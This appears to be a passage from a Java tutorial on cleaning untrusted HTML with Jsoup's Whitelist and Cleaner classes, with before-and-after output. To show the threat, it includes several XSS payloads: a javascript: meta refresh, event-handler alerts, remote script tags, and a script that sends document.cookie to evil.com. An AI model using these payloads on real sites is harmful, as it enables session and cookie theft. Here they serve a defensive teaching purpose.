HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.
If you've never heard about XSS before, I suggest you learn more about it to follow this section.
Our task in this section is to clean the buggy, XSSed HTML:
<html> <head> <title>Section 05: Clean dirty HTML</title> <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');"> <meta charset="utf-8" /> </head> <body onload=alert('XSS02')> <h1>Jsoup: the HTML parser</h1> <scriptsrc=http://ha.ckers.org/xss.js></script> <img """><script>alert("XSS03")</script>"> <imgsrc=# onmouseover="alert('xxs04')"> <script/XSSsrc="http://ha.ckers.org/xss.js"></script> <script/src="http://ha.ckers.org/xss.js"></script> <iframesrc="javascript:alert('XSS05');"></iframe> <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" /> <imgsrc="www.w3.org/html/logo/img/mark-only-icon.png" /> </body> </html>
If you open this file in the Chrome or Firefox browser, you will see the XSS. Just imagine that if users open this XSSed HTML and are redirected to a page that hackers have total control over, the hackers could, for example, steal users' cookies, which is very dangerous.
<img """> <script> document.location = 'http://evil.com/steal.php?cookie=' + document.cookie; </script>">
There are thousand ways for XSS attacks to occur, so you should avoid and clean it; it's time for Jsoup to do its job.
Load the
Document
class structure.File file = new File("index.html"); Document doc = Jsoup.parse(file, "utf-8");
Create a whitelist.
Whitelist allowList = Whitelist.relaxed();
Add more allowed tags and attributes.
allowList .addTags("meta", "title", "script", "iframe") .addAttributes("meta", "charset") .addAttributes("iframe", "src") .addProtocols("iframe", "src", "http", "https");
Create
Cleaner
, which will do the cleaning task.Cleaner cleaner = new Cleaner(allowList);
Clean the dirty HTML.
Document newDoc = cleaner.clean(doc);
Print the new clean HTML.
System.out.println(newDoc.html());
This is the result of the cleaning:
<html> <head> </head> <body> <h1>Jsoup: the HTML parser</h1> <script> </script> <img /> <script> </script>"> <img /> <script> </script> <script> </script> <iframe> </iframe> <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" /> <img /> </body> </html>
Indeed, the resulting HTML is very clean and there is almost no script at all.
The complete example source code for this section is available at \source\Section05
.
The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist
.
Whitelist allowList = Whitelist.relaxed(); allowList .addTags("meta", "title", "script", "iframe") .addAttributes("meta", "charset") .addAttributes("iframe", "src") .addProtocols("iframe", "src", "http", "https");
Here we define Whitelist
, which is created through the relaxed()
method and contains the following tags:
a
, b
, blockquote
, br
, caption
, cite
, code
, col
, colgroup
, dd
, dl
, dt
, em
, h1
, h2
, h3
, h4
, h5
, h6
, i
, img
, li
, ol
, p
, pre
, q
, small
, strike
, strong
, sub
, sup
, table
, tbody
, td
, tfoot
, th
, thead
, tr
, u
, and ul
If you want to add more tags, use the method addTags
(String
… tags). As you can see, the list of tags created through relaxed()
doesn't have <meta>
, <title>
, <script>
, and <iframe>
, so I added them to the list manually by using addTags()
.
If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.
One special attribute is src
, which contains a URL to a file, and it's always a good practice to give a protocol to prevent inline scripting XSS. Consider the previous bug HTML line:
<iframesrc="javascript:alert('XSS05');"> </iframe>
The attribute "src"
is supposed to refer to a URL but it actually does not. The fix is to ensure the "src"
value is acquired through HTTP or HTTPS. That is what the following line means:
.addProtocols("iframe", "src", "http", "https");
You can write in chain while adding tags or attributes.
While Whitelist
provides the safe tag list, Cleaner
, on the other hand, takes Whitelist
as input to clean the input HTML:
Cleaner cleaner = new Cleaner(allowList); Document newDoc = cleaner.clean(doc);
The new Document
class is created after cleaning is done.
Cleaner
only keeps the allowed HTML tags provided by Whitelist
input; everything else is removed.
For convenience, Jsoup supports the following five predefined white-lists:
none()
: This allows only text nodes, all HTML will be strippedsimpleText()
: This allows only simple text formatting, such asb,
em,
i,
strong,
andu
basic()
: This allows a fuller range of text nodes, such asa
,b
,blockquote
,br
,cite
,code
,dd
,dl
,dt
,em
,i
,li
,ol
,p
,pre
,q
,small
,strike
,strong
,sub
,sup
,u
, andul
, and appropriate attributesbasicWithImages()
: This allows the same text tags such asbasic()
and also allows theimg
tags, with appropriate attributes, withsrc
pointing tohttp
orhttps
relaxed()
: This allows a full range of text and structural body HTML tags, such asa
,b
,blockquote
,br
,caption
,cite
,code
,col
,colgroup
,dd
,dl
,dt
,em
,h1
,h2
,h3
,h4
,h5
,h6
,i
,img
,li
,ol
,p
,pre
,q
,small
,strike
,strong
,sub
,sup
,table
,tbody
,td
,tfoot
,th
,thead
,tr
,u
, andul
If you pay more attention, you can see that everything inside the <head>
tag is removed, even when you allow them in the whitelist as shown in the previous code.
Note
The current version of Jsoup is 1.7.2; please look up GitHub, lines 45 and 46, at the following location:
https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45
The cleaner keeps and parses only <body>
, not <head>
as shown in the following code snippet:
if (dirtyDocument.body() != null) copySafeNodes(dirtyDocument.body(), clean.body());
So, if you want to clean the <head>
tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:
if (dirtyDocument.head() != null) copySafeNodes(dirtyDocument.head(), clean.head());